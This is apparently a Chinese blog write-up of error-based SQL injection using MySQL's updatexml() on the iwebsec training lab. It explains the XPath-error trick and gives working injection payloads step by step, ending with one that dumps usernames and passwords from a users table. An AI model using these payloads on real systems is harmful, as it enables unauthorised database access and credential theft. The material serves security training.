iwebsec-updatexml报错注入

原理分析

Updatexml()函数"updatexml(XML_document, XPath_string, new_value);"

参数 描述
XML_document String格式,为XML文档对象的名称,文中为Doc
XPath_string Xpath格式的字符串
new_value String格式,替换查找到的符合条件的数据

即sql语句为"select updatexml(1,concat(0x7e,(SELECT user()),0x7e),1"

concat()函数是将其连成一个字符串,因此不会符合XPATH_string的格式,从而出现格式错误,爆出用户

0x7eASCII码,实为~,upadtexml()报错信息为特殊字符、字母及之后的内容,为了前面字母丢失,开头连接一个特殊字符~

实战注入

1.判断是否存在漏洞,添加and 1=1# 页面正常回显,and 1=2# 页面回显异常,即存在sql注入漏洞

2.爆出数据库

复制代码
id=1 and (updatexml(1,concat('~',(select database())),3))#

3.爆出表

复制代码
id=1 and (updatexml(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schame=database())),3))#

4.爆出users表字段

复制代码
id=1 and (updatexml(1,concat('~',(select group_concat(column_name) from information_schema.columns where table_name='users')),3))#

5.爆数据

复制代码
id=1 and (updatexml(1,concat('~',(select group_concat(username,',',password) from users)),3))#
相关推荐
网络安全许木11 分钟前
自学渗透测试第30天(第一阶段总结与Metasploitable3部署)
网络安全·渗透测试
黄俊懿2 小时前
MySQL主从复制:从“异步“到“GTID“,数据同步的进化之路
数据库·sql·mysql·oracle·架构·dba·db
王大傻09282 小时前
注入攻击的概念
web安全·网络安全
txg6662 小时前
MDVul:用语义路径重塑漏洞检测的图模型能力
人工智能·安全·网络安全
看海的四叔3 小时前
【SQL】SQL-管好你的字符串
大数据·数据库·hive·sql·数据分析·字符串
南行*3 小时前
CodeQL 初探
安全·网络安全·系统安全
@小柯555m4 小时前
MySql(高级操作符--高级操作符练习(2))
数据库·sql·mysql
Mr_linjw4 小时前
MySQL 中监控和优化慢 SQL & 索引小知识
数据库·sql·mysql
雾岛听风6914 小时前
Sql server
数据库·sql·sqlserver
橙子圆1235 小时前
Mybatis之动态sql
sql·tomcat·mybatis